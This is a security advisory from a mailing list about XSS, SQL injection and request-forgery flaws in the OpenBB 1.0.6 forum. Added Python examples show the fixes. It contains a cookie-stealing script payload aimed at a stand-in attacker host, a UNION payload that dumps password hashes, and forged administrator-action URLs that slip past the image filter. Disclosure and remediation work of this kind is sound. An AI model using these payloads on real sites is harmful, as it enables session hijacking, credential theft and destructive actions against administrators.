[UNIX] OpenBB Multiple Vulnerabilities (board.php, search.php, member.php, post.php, myhome.php, index.php)

From: SecuriTeam (support_at_securiteam.com)
Date: 05/02/04

    To: list@securiteam.com
    Date: 2 May 2004 11:24:12 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

    - - - - - - - - -

      OpenBB Multiple Vulnerabilities (board.php, search.php, member.php,
    post.php, myhome.php, index.php)
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.openbb.com> OpenBB is a fast, lightweight, powerful bulletin
    board written in PHP/MySQL. Main features include: full customization via
    styles templates, instant messaging, private messaging, categories, member
    ranks, poll based threads, moderation, BB codes, thread notifications,
    avatars, member lists, private forums and more."

    Several types of attack are possible against OpenBB. The package contains
    bugs ranging from cross-site scripting and SQL injection to forged
    administrative requests, which this advisory terms arbitrary command
    execution.

    DETAILS

    Vulnerable Systems:
     * OpenBB version 1.0.6

    Cross-site Scripting
    OpenBB reflects unsanitized request parameters into its pages in several
    files. Script can be injected and executed in the context of the victim's
    browser, or used to harvest sensitive data such as the contents of cookies
    (the session cookie being the prime example).

    Some vulnerable scripts are listed below:
    /member.php?action=login&redirect=[XSS]
    /myhome.php?action=newmsg&to=blah[XSS]
    /post.php?action=mail&TID=1[XSS]
    /index.php?redirect=[XSS]
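    The following is an added example (not code from OpenBB or from the advisory) that shows, in Python rather than the project's PHP, why a reflected parameter such as redirect= is exploitable and what the fix looks like: the parameter echoed verbatim into an attribute versus entity-encoded for that context, plus a validator that only accepts a same-site path for the post-login redirect. The payload, the attacker host and the form markup are constructed for the example.

```python
import html
from urllib.parse import urlsplit

# Constructed payload of the kind the advisory lists for
# member.php?action=login&redirect=[XSS]; the attacker host is assumed.
PAYLOAD = '"><script>document.location="http://attacker.example/?c="+document.cookie</script>'


def render_redirect_field_unsafe(redirect):
    """The vulnerable pattern: the request parameter is echoed into an attribute
    verbatim, so a leading quote closes the attribute and the rest is parsed as markup."""
    return '<input type="hidden" name="redirect" value="' + redirect + '">'


def render_redirect_field_safe(redirect):
    """Attribute-context escaping: &, <, > and both quote characters are entity-encoded,
    so the browser sees one opaque attribute value and no new tags."""
    return '<input type="hidden" name="redirect" value="' + html.escape(redirect, quote=True) + '">'


def safe_redirect_target(redirect, default='/index.php'):
    """Accept only a same-site path for the post-login redirect; anything else falls
    back to the default. Rejects absolute URLs, scheme-relative //host and /\\host,
    javascript: URLs, and control or markup characters."""
    if not redirect or not redirect.startswith('/') or redirect.startswith(('//', '/\\')):
        return default
    parts = urlsplit(redirect)
    if parts.scheme or parts.netloc:
        return default
    if any(ch in redirect for ch in '\r\n\x00<>"\\'):
        return default
    return redirect
```

    The encoding function is chosen by the output context (here an attribute), not by the input; a redirect value that later ends up in a Location header or a JavaScript string needs its own treatment, and the allowlist on the target shape is what stops the same parameter being used as an open redirect.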

    SQL Injection
    Some fields supplied by users are not properly sanitized, allowing an
    attacker to pass additional SQL commands to the backend database. A
    snippet of code from one of the vulnerable scripts (post.php) is presented
    below:
    // Check to make sure they are not posting to a category
    $query_type = new query($SQL, "SELECT type FROM " . $prefix . "forum_display WHERE forumid = $FID");
    $query_type->getrow();
    $ftype = $query_type->field('type');

    The $FID parameter is taken straight from the request and interpolated into
    the SQL string without being cast, escaped or validated in any way. The same
    pattern occurs in more than one file and is not limited to 'post.php'.

    Other vulnerable scripts are listed below (and their vulnerable
    parameter):
    /board.php?FID=1[SQL]
    /member.php?action=list&page=1&sortorder=[SQL]
    /member.php?action=list&page=1&sortorder=username&perpage=[SQL]
    /member.php?action=passwdsend&resetid=blah&id=2[SQL]
    /search.php?&sortby=dateline&sort=DESC&q=open&forums%5B[SQL]%5D
    /post.php?action=edit&page=1&PID=1[SQL]
    /post.php?action=post&FID=1[SQL]
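    The following is an added example, not code from OpenBB or from the advisory, written in Python against an in-memory SQLite database so that it runs stand-alone (the project itself is PHP/MySQL). It reconstructs the post.php pattern above with $FID interpolated into the query, shows a UNION payload pulling rows from a member table through it, and then gives the hardened forms for the two kinds of parameter the list above contains: numeric ids such as FID/PID/id (cast and bound), and the member.php sortorder and perpage values, which land in ORDER BY and LIMIT and so need an allowlist and a range check rather than a bound string. The table prefix, table layout, member rows and password values are all constructed for the example.

```python
import sqlite3

PREFIX = 'openbb_'   # assumed table prefix; OpenBB's $prefix is configurable


def make_db():
    """Constructed in-memory schema mirroring the tables the advisory's snippet touches."""
    db = sqlite3.connect(':memory:')
    db.executescript("""
        CREATE TABLE openbb_forum_display (forumid INTEGER, type TEXT);
        INSERT INTO openbb_forum_display VALUES (1, 'forum'), (2, 'category');
        CREATE TABLE openbb_member (id INTEGER, username TEXT, password TEXT);
        INSERT INTO openbb_member VALUES (1, 'admin', 'constructed_admin_hash'),
                                         (2, 'bob',   'constructed_bob_hash');
    """)
    return db


def forum_type_vulnerable(db, fid):
    """Reconstruction of the post.php pattern: the request value is glued into the SQL."""
    sql = "SELECT type FROM " + PREFIX + "forum_display WHERE forumid = " + fid
    return [row[0] for row in db.execute(sql)]


def forum_type_fixed(db, fid):
    """Numeric id: reject anything that is not a plain integer, then bind it as a parameter."""
    if not (isinstance(fid, str) and fid.isdigit()):
        raise ValueError('FID must be a non-negative integer')
    sql = "SELECT type FROM " + PREFIX + "forum_display WHERE forumid = ?"
    return [row[0] for row in db.execute(sql, (int(fid),))]


# Column names cannot be bound as parameters, so member.php's sortorder must be allowlisted.
ALLOWED_SORTORDER = {'username', 'id'}


def member_list_fixed(db, sortorder, perpage):
    """Hardened equivalent of member.php?action=list&sortorder=...&perpage=...:
    the ORDER BY column comes from a fixed set and the LIMIT count is an integer
    in a sane range, bound as a parameter."""
    if sortorder not in ALLOWED_SORTORDER:
        raise ValueError('unknown sortorder')
    try:
        perpage = int(perpage)
    except (TypeError, ValueError):
        raise ValueError('perpage must be an integer')
    if not 1 <= perpage <= 100:
        raise ValueError('perpage out of range')
    sql = "SELECT username FROM " + PREFIX + "member ORDER BY " + sortorder + " LIMIT ?"
    return [row[0] for row in db.execute(sql, (perpage,))]


# Constructed payload for the FID parameter: the trailing UNION turns a lookup of a
# forum's type into a dump of every stored password hash.
UNION_PAYLOAD = "1 UNION SELECT password FROM " + PREFIX + "member"
```

    The forum_type_fixed check is deliberately stricter than intval(): a value such as "1 UNION ..." is rejected outright rather than silently truncated to 1, so the log records an attack instead of a normal page view.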

    Arbitrary Command Execution
    Administrative and moderation actions in OpenBB are performed by plain GET
    requests that are honoured on the strength of the viewer's session alone.
    A malicious user can therefore have such an action executed by sending the
    administrator a private message, or posting a message, with the action URL
    embedded in it; when the administrator views the message, his browser
    issues the request with his own credentials and the action is carried out
    silently. (The advisory calls this arbitrary command execution; it is what
    is now called cross-site request forgery.)

    Below are some examples of administrative commands that can be placed in
    an image tag or a malicious link:
    /cp_forums.php?do=remove&id=1
    /cp_usergroup.php?do=remove&UGID=1
    /cp_ipbans.php?action=do_delip&ipid=1

    Other state-changing actions that can be triggered the same way:
    /myhome.php?action=delmsg&box=inbox&id=all
    /post.php?action=edit&PID=1&send=1&delete=yes
    /moderator.php?action=announce&TID=1

    OpenBB does attempt to block such attacks by restricting what an image tag
    may contain. However, the check is flawed.

    Below is a code snippet from the '/lib/codeparse.php' file that is
    responsible for the filtering:
    case 'img':
        if (!preg_match('#^(http|https)://(.*?)\.(gif|jpg|jpeg|png)$#', $inside))
            $return = '[ invalid image ]';
        else
            $return = '<img src="' . str_replace('"', '', $inside) . '" alt="User-Posted Image (tm)" border="0" />';
        break;

    All an attacker has to do to get the request issued is make sure the URL
    inside the image tag ends with an allowed extension. The regular expression
    only inspects the tail of the string, so appending a dummy query parameter
    whose value ends in .jpg satisfies the check while leaving the real
    parameters in place; the administrator's browser then fetches the URL as an
    image and the action is executed.

    For example:
    /post.php?action=edit&PID=1&send=1&delete=yes&image=blah.jpg
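    The following is an added example, not code from OpenBB or from the advisory, written in Python rather than the project's PHP. It transcribes the codeparse.php image check to show that the forged URL above passes it, and then shows the fix that actually closes the hole: a token derived from the viewing user's own session, required on every state-changing action, which a URL planted in someone else's message cannot carry. The forum host name, the session secret and the handle_action dispatcher standing in for post.php and the cp_*.php scripts are all assumptions of the example.

```python
import hashlib
import hmac
import re
from urllib.parse import parse_qs, urlsplit

# Python transcription of the PCRE check in lib/codeparse.php; re.match and preg_match
# agree on this pattern: only the scheme and the extension at the very end are tested.
IMG_RE = re.compile(r'^(http|https)://(.*?)\.(gif|jpg|jpeg|png)$')


def img_tag_openbb(inside):
    """Reproduction of the 'img' case: regex on the whole string, then strip double quotes."""
    if not IMG_RE.match(inside):
        return '[ invalid image ]'
    return '<img src="' + inside.replace('"', '') + '" alt="User-Posted Image (tm)" border="0" />'


# Constructed forged URL of the kind shown above; the host name is assumed.
FORGED = 'http://forum.example/post.php?action=edit&PID=1&send=1&delete=yes&image=blah.jpg'


def issue_token(session_secret, action):
    """Per-session, per-action token, emitted only into forms and links rendered for
    the logged-in user whose session secret this is."""
    return hmac.new(session_secret, action.encode(), hashlib.sha256).hexdigest()


def handle_action(url, session_secret):
    """Hypothetical dispatcher standing in for post.php / cp_*.php. The action is
    executed only if the request carries the token for the session that is
    viewing it; an attacker writing a message for the admin never sees that secret."""
    q = parse_qs(urlsplit(url).query)
    action = q.get('action', [''])[0]
    token = q.get('token', [''])[0]
    expected = issue_token(session_secret, action)
    if not hmac.compare_digest(token.encode(), expected.encode()):
        return 'rejected: missing or invalid CSRF token for ' + action
    return 'executed: ' + action
```

    Tightening the image regex (for instance parsing the URL and refusing a query string) would not be a fix on its own: an attacker can host a file at a URL that does end in .jpg and have it redirect the administrator's browser to the action. The token check, together with accepting destructive actions only over POST, works regardless of how the request was provoked.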

    ADDITIONAL INFORMATION

    The information has been provided by JeiAr <security@gulftech.org>.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

